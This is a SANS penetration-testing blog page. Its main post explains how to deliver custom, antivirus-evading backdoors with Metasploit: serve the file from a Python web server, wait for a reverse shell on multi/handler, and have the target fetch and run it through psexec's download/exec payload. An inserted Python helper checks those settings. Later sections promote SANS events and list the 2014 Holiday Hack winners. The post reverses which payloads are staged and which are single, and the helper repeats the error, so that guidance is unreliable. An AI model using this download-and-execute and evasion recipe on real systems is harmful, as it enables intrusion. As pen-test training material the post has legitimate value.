Custom Payloads in Metasploit

[Editor’s Note: Mark Baggett shares some useful insights into delivering custom payloads using Metasploit, with a little Python magic to boot! –Ed.]

By Mark Baggett

You launch your Metasploit exploit.  It looks like it is working but no session is created. What happened?  Your exploit just got popped by antivirus software.  Such a bummer.  Antivirus software is a hurdle that you have to overcome as a penetration tester, modeling the techniques of the real-world bad guys.  The best way to avoid antivirus software is to stop using a payload that someone else created.  Time and time again, penetration testers find they have a basic need to use custom payloads.

Create your own custom payload, and then you won’t have to worry about an AV signature catching your payload and eating it!  It is easy, and it gives you the flexibility to go after any target.  There are lots of tools and articles to help you do so, including the Veil framework.

So you build your own custom payload, now what? How do you operationalize your payload? How do you deliver it to a target and execute it?  There are lots of ways to deliver a custom payload, but I’ll cover one of the easiest and most flexible options here.

Metasploit’s Download/Exec Payload is a great option for delivering a custom payload to a target.  You can use it with most of Metasploit’s exploits, including memory corruption exploits, misconfiguration exploits, and authenticated attacks like PSEXEC.  This flexibility means that, with this Metasploit payload, you can use your custom payload anywhere you could otherwise use Meterpreter.

To use the Download/Exec payload, you will need to do three things.  First, you’ll need a website from which the victim can download your custom backdoor.  Second, you will need to set up a Metasploit handler to receive the connection from your custom backdoor.  Lastly, you’ll need an exploit to deliver your custom payload.  Let’s take a look at each of the steps.

1) A website to provide the “Download” in the Download/Exec payload

You have lots of options for a website to deliver your payloads.  Any time I need a “quick and easy” website, I use Python.  The first step to starting the Python web server is to change to the directory that contains the files you want to make available for download.  Then the command “python -m ‘SimpleHTTPServer’ <port number>” can be used to start a web server.  The files in that directory can then be downloaded using any web browser.  You can set up this server on any computer that has Python installed.  Here, I’ve started a web server listening on port 8000.  When the exploit runs, you’ll see the download being logged by your web server.  Here you can see the victim 10.1.1.170 downloading a copy of “pythonbackdoor.exe”.


2) Start a handler to receive your shell

Starting the multi/handler requires a few simple commands.  First is “use multi/handler”.  Next, set your payload to one that is compatible with the custom payload you created.  If your payload contains Meterpreter, then you will “set payload windows/meterpreter/reverse_tcp”.  If it is a command prompt, then you would type “set payload windows/shell/reverse_tcp”.  Since my Python backdoor sends a command prompt, the correct payload here is “windows/shell/reverse_tcp”.  This “single” payload doesn’t use a stager and expects a connection from a shell.  Do not confuse this with “windows/shell_reverse_tcp”, since “windows/shell_reverse_tcp” is expecting a connection from a stager, not a shell.  Setting LHOST to 0.0.0.0 will cause Metasploit to listen on all the network addresses on your host.  This is a good shortcut for single payloads, but it is not a good idea to use this for staged payloads.  Some stagers, for example /*/reverse_http, will require that you have an actual routed address so that the stager knows where to download the next stage.  Next, set your LPORT to the port your custom payload is hardcoded to connect to.  In this example, my payload is set to send a command prompt to port 80.  Finally, you’ll need to start the multi/handler, but our work in Metasploit is still not finished, so you’ll also need to start it as a background task.  To do this, the “-j” option to the exploit command will start the multi/handler as a “job” that runs in the background.


3) Exploit the target and deliver the payload

With your handler in the background waiting to receive a connection, you’re ready to exploit the target.  Just about any exploit could be used, but, remembering my Penetration Tester’s Pledge, I’ll use PSEXEC.  First, I “use windows/smb/psexec” and set it up with the correct username and password for the target.  Then I set my payload by typing “set PAYLOAD download/exec”.  The options are pretty simple.  You set the URL to point to the custom payload on the web server that you set up in step 1.  You can change the name of the file that will be saved to the target if you like.


When you type “exploit” you will see it download from your website and a shell will appear in your handler.  Game On.  Let the pivots begin.
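The three steps above leave several settings that have to agree with each other: the handler’s payload type must match what the backdoor sends, LPORT must match the port hardcoded into the backdoor, 0.0.0.0 is only a safe LHOST for single payloads, and the Download/Exec URL must point at a file the Python web server is actually serving on the port it was started with.  The following Python 3 helper, an added example rather than code from the original post, cross-checks those settings and parses the web server’s console log to confirm which host fetched the file; the web server address 10.1.1.1 and the sample log lines are constructed.

```python
import re
from urllib.parse import urlparse

# 0.0.0.0 works as LHOST for single payloads, but an http(s) stager needs a
# routed address to fetch its next stage, as the post explains.
HTTP_STAGERS = ("reverse_http", "reverse_https")

# One access-log line as printed by Python's SimpleHTTPServer / http.server:
# 10.1.1.170 - - [11/Feb/2015 18:42:32] "GET /pythonbackdoor.exe HTTP/1.1" 200 -
LOG_LINE = re.compile(
    r'^(?P<client>\S+) - - \[(?P<when>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def check_handler(payload, lhost, lport, backdoor_port, backdoor_kind):
    """Compare the multi/handler settings with the custom backdoor, which
    sends either a 'shell' or 'meterpreter'. Returns a list of mismatches."""
    problems = []
    kind = payload.split("/")[1].split("_")[0]   # windows/shell_reverse_tcp -> shell
    if kind != backdoor_kind:
        problems.append(f"payload {payload} does not match a {backdoor_kind} backdoor")
    if lport != backdoor_port:
        problems.append(f"LPORT {lport} != port {backdoor_port} hardcoded in the backdoor")
    if lhost == "0.0.0.0" and payload.endswith(HTTP_STAGERS):
        problems.append("LHOST 0.0.0.0 cannot be used with an http(s) stager")
    return problems

def check_download(url, web_port, served_files):
    """Check that the Download/Exec URL points at a file the web server
    from step 1 can serve, on the port it was started with."""
    u = urlparse(url)
    problems = []
    port = u.port or (443 if u.scheme == "https" else 80)
    if port != web_port:
        problems.append(f"URL port {port} != web server port {web_port}")
    if u.path.lstrip("/") not in served_files:
        problems.append(f"{u.path} is not in the served directory")
    return problems

def downloads_of(log_text, filename):
    """Return (client, timestamp) for every successful GET of filename
    found in the web server's console output."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if (m and m["method"] == "GET" and m["status"] == "200"
                and m["path"].lstrip("/") == filename):
            hits.append((m["client"], m["when"]))
    return hits

# Constructed sample of the server output described in step 1.
SAMPLE_LOG = """\
10.1.1.170 - - [11/Feb/2015 18:42:32] "GET /pythonbackdoor.exe HTTP/1.1" 200 -
10.1.1.55 - - [11/Feb/2015 18:43:01] "GET /favicon.ico HTTP/1.1" 404 -
10.1.1.170 - - [11/Feb/2015 18:43:10] "GET /pythonbackdoor.exe HTTP/1.1" 200 -
"""

if __name__ == "__main__":
    print(check_handler("windows/meterpreter/reverse_http", "0.0.0.0", 8080, 80, "shell"))
    print(check_download("http://10.1.1.1:8000/pythonbackdoor.exe", 8000, {"pythonbackdoor.exe"}))
    print(downloads_of(SAMPLE_LOG, "pythonbackdoor.exe"))
```

An empty list from either check means the settings agree; the log parser ignores 404s and other files, so a second entry for the same client simply means the target fetched the file twice.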

So now the question is: do you have a custom payload to deliver to a target?  If not, there are several options.  Veil is a great option.  It will create a customized version of Meterpreter, and it does an excellent job of avoiding antivirus software.  Or, you can write your own.

Want to be a certified Python Coder? Learn more: www.giac.org/gpyc

-Mark Baggett


Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying-like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions for free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen

EXTRA EXTRA! The New SANS Pen Test Poster

Extra! Extra! Read all about it! This week, many of you will be receiving our brand-spankin’ new SANS Pen Test Poster in the mail.  Please be on the lookout, because it’s got some really cool stuff on attack surfaces, tools, and techniques.  It’s included in the mailing with the SANS Security West brochure.


The poster is chock full of some really nifty pen test advice from some of the best pen testers I know, including:

Tim Medin
Seth Misenar
Larry Pesce
Justin Searle
Steve Sims
John Strand
Josh Wright

The poster includes several sections.  On one side, we’ve got a description of the SANS Pen Test Coins (collect all eleven!), an overview of the SANS Pen Test Curriculum, and a super updated version of the Pen Test Practice Lab Mind Map created by Aman Hardikar .M, with pointers to all kinds of great exploitable distributions and “hack-this-site” targets for you to practice and build your skills.  Aman’s mind maps are simply fantastic.


The reverse side includes a view of different attack surfaces in a given example target enterprise, and all the different methods, tools, and techniques pen testers can apply against such target infrastructures.  We’ve got a couple of views of network pen testing, an approach to wireless pen testing, some web app pen testing details, and a really cool view of mobile device and infrastructure pen testing.  Each one provides a step-by-step approach to penetrating the target organization, with a list of each tool used along the way.


So, you might be wondering… how can I get a poster?  Well, like I mentioned above, we’ve dropped them in the mail to many people along with the SANS Security West (San Diego) brochure.  If you don’t get one in the mail, we’ll have some on-hand at upcoming SANS events, and we’d be delighted to hand you one there.  Alternatively, if you can’t make it and just want to download a high-res copy, please click here.

If you want a printed version but didn’t receive one in the mail, please reach out to me in the comment section below, and I’ll be in touch.

I really do hope you enjoy the posters, and I’m really grateful for all the hard work of the SANS Pen Test Instructor team who provided such great input on this one.

Have fun pen testing all the things!!!

Thank you–

–Ed.


2014 SANS Holiday Hack Winners and Official Answers

[Editor’s Note: Every year for eleven seasons now, SANS creates a Holiday Hack challenge for you to build your skills with real-world infosec tools and techniques, all the while having some good holiday-inspired fun, for everyone to participate in, no charge at all.  If you haven’t checked out our most recent SANS Holiday Hack Challenge, you should definitely read through it.  This year’s challenge was written by Ed Skoudis and Josh Wright, with support from Tom Hessman and the vocal stylings of James Lyne.  We’ll keep the challenge itself, the target servers, and the file system image available for as long as possible, so you can continue to work through it, either on your own, or referencing the official answers cited below.  Have fun!!!  Following immediately below is our official announcement of winners and answers.  –Ed.]

Lynn Cratchit emerged from the rather toasty Secret Room, a gentle smile lighting up her countenance.

“Mr. Scrooge… have you finished judging this year’s SANS Holiday Hack Challenge entries?” she inquired.

A bedraggled Scrooge looked up wearily from his desk, surrounded by piles upon piles of papers stacked high all about. An increasingly healthy Tiny Tom looked upon the scene whilst holding an impossibly cute orphaned puppy, awaiting Scrooge’s answer.

The old man began to speak slowly, “All told, we received an avalanche of responses to our challenge, several hundred people from around the globe sending in their answers. Their response was both overwhelming and…” the old man paused… “Wonderful.” His eyes, I tell you, started to sparkle.

“I’m deeply touched by the outpouring of technical wizardry, analytical excellence, whimsical wit, and outright humor in these answers! Some were marvels of concision, while others were detailed treatises several dozen pages long. Many were straight arrow, while others plunged for the jugular of hilarity. Think about it! Those ghosts posed challenges from many different skill sets: social engineering, penetration testing, packet analysis, forensics analysis, and so much more! But, all in all, these very entries have shown beyond a doubt the great skill, extreme discipline, special patience, good will, and amazing character of people in our community. Why, one joker even posited this preposterous thing in his answers:

The characters in the story appear to be a loose portrayal of the staff of Counter Hack Challenges: Skoudis as Scrooge, Tom Hessman as Tiny Tom (rather than Tiny Tim), and Lynn Schifano as Mrs. Lynn Cratchit; and apparently, Ed keeps the secret room at the office a little cold for Lynn and Tom.”

“What nonsense!” laughed Cratchit, as her new heater chugged away spreading its radiant warmth throughout the Secret Room.

After a hearty guffaw, Tiny Tom asked the most pertinent question, “So… do we have a winner, Dear Scrooge?”

“Why yes, we do! There were so many great entries. Behold, here are the lists of noteworthy responses and our winners.” Scrooge handed a scroll to Ms. Cratchit bearing the following proclamation….

Ebenezer Scrooge here… I’m delighted to announce this year’s honorable mentions and winners for the 2014 Holiday Hack Challenge, “A Christmas Hacking Carol.”

Honorable Mentions

All of these dear people correctly solved each challenge and recovered every one of the ghosts’ secrets. They are worthy of praise and have earned an honorable mention:

Anthony Canino Joshua Roark
Ben Allen Kerem Kocaer
Brad Berkemier Mark Elliott
Brian Boswell Mark Guth
Brian Wiltse Martin Tyrer
Bryan Rhodes Matt Edmondson
Bryan Smith Matt Keyser
Charles.L.Rice Michael Dyrmose
Chris Wallace Mohammed Faiz Ahmed Quadri
Christopher Dubsky Nick McKerrall
Dan Cândea Pgntest
Davide Berra Piotras
Dominick Barbuscio Richard Tafoya
Giacomo Milani Thomas Herrell
jane doe Tom Pohl
Johnny Medina Tyler Halfpop
Jon Searles Warren J Raquel
Joshua Roark Yassine id bougnoun
Kerem Kocaer

REALLY Honorable Mentions

In this next group, we have people whose answers included some extra special narrative or deep technical insights. These folks have earned a REALLY Honorable Mention:

Annah Waggoner Josh V
Anthony Magnus Lund Jacobsen
Austyn Krutsinger Mario Acosta Arteaga
Carrie Roberts Michael Pella
Chris Andre Solberg Dale Nick McKerrall
Christian Bajada Patrick Mooney
Delaney Ng Paul M. Goffar
Dinesh Peter Dayok
Eddy Vanlerberghe Richard Gold
Gebhard Zocher Rick El-Darwish
Harinderjeet Singh Ronnnie Friis Salomonsen
Ian Spyder Lovecraft Fabrizio
Jam4ar Tsvetelin Choranov
Jonas Strand

Stunning Awesomeness

This next group of answers exhibited simply stunning awesomeness. Each was a contender for the top slot, and it was a true honor to read their answers.

Anatolie Prisacaru (shark0der): A wealth of technical insight in this one.  The Force is strong with its author, for sure!

Andrew Rowbotham: This solution is brilliantly laid-out and nicely detailed, with XKCD to boot!

Chris Eckert: This is a GREAT write-up, complete with hilarious memes from throughout the Internet… a pleasure to read and absorb.

Jeremy Galloway (Cypher G): The animation in this solution is infectious with excitement.  What a joy to read!

david switzer: Interested in some awesome rhyme, along with technical analysis?  You gotta check this one out then!

Don C. Weber: This report is stunningly good, a virtuoso performance with an impressive style and format for incident response, along with recommendations for preventing future occurrences of ghastly hacking interventions.

Jerome Kleinen: With its alternative ending, this solution makes for very fun and compelling reading.

Jim Herubin: What a GREAT, detailed, and well-formatted solution.  Nice work!

Joshua Tomkiel: This solution is smooth throughout, with a great description of each step, plus an excellent and clear format.

Rich Cassara: The 1940’s Private Eye Film Noir feel to this solution was awesome, bringing a smile. Plus, he re-imagined the entire point of the challenge, wherein a team tricks Scrooge through the use of an Oculus Rift, rather creative pharmacology, and even a trebuchet to simulate all of the ghastly action.  Simply amazing!

The Winners

And now… Our winners.

Random Draw

We’ll start with our Random Draw winner, who will receive an autographed copy of the Counter Hack Reloaded book.  Using a random number chosen by the fine folks at random.org, our winner is….

Matt Keyser

Most Creative Answer

Next up is our Most Creative Answer that is Technically Correct, who will also receive the Counter Hack Reloaded book. The winner for this one is a simply delightful and hilarious story full of Dr. Who and even some Star Wars references. We smiled and laughed our way through this great set of answers. It’s AWESOMELY creative!  And the winner is….

Mike Cecil

Best Technical Answer

Competition here was fierce, with so many strong contenders. But, in looking through them all, we received a very special entry that graphically illustrated the solution to each and every challenge, step-by-step with FANTASTIC figures. If you’d like a quick and handy reference guide on how to conquer each challenge, you should definitely read this set of answers. Our best technical answer winner, who will also receive the Counter Hack Reloaded book, is….

Masashi Fujiwara

GRAND Prize Winner

And finally we have our GRAND Prize winner, who receives a free SANS OnDemand course. This entry covers each and every twist of the challenge and its solution, highlighting all of the subtleties that Josh Wright and Ed Skoudis buried in the challenge. In fact, the answer is so good that we consider it the OFFICIAL answer for this year’s SANS Holiday Hack challenge. If you are looking for how to conquer each and every one of the ghost’s secrets, we urge you to read the GRAND Prize winning answer by…

Dave Lassalle

Congrats to all our winners!

The entire team here wishes to thank everyone who worked through the challenge! Josh Wright, Tom Hessman, Lynn Schifano, Tim Medin, Jeff McJunkin, Tom VanNorman, and me (old Ebenezer Scrooge) are truly honored that you invest your time each year developing your skills and having fun with our quirky creations. For each Holiday Hack, we try to create a little Christmas world, distinct from each of our previous challenges with brand new technical twists, offering you an opportunity to dig in and develop real-world information skills based on very recent attacks, tools, and techniques. Our goal is to create the very best challenges we are able to muster to spread some unique holiday fun by varying the style, technical approach, tools, and techniques every year. Also, we leave our challenges up for as long as possible. Feel free to work through them again, or even go through our previous ones, such as our 2013 installment (It’s a Hackerful Life featuring attacks against Industrial Control Systems), 2012’s challenge (The Year without a Santa Hack, focussed on web app pen testing), or 2011’s missive (Grandma Got All Haxx0red by a Reindeer, chock full of in-depth packet analysis).

Oh, and one more thing… We’re already starting work on our 2015 challenge, our best ever, which will feature some really distinct delights, including some whacky wireless, a little firmware analysis, and an Internet-wide scavenger hunt for special stuff we’re going to squirrel away so that Santa himself couldn’t find it. We’ll launch it the second week of December, 2015.  I can’t wait!

–Eb.

Er… I mean…

–Ed.


p.s., If you like this kind of thing and want to build your skills through some excellent training, please do check out SANS course offerings, especially those in the Pen Test Curriculum.  We’ve got lotsa great in-depth offerings to choose from, including SANS Security 560 on Network Pen Testing (which I’m teaching in Feb in Scottsdale AZ, March in Baltimore, April in Orlando, and May in Austin TX), SANS Security 575 on Mobile Device Security & Pen Testing, and SANS Security 660 on Advanced Pen Testing!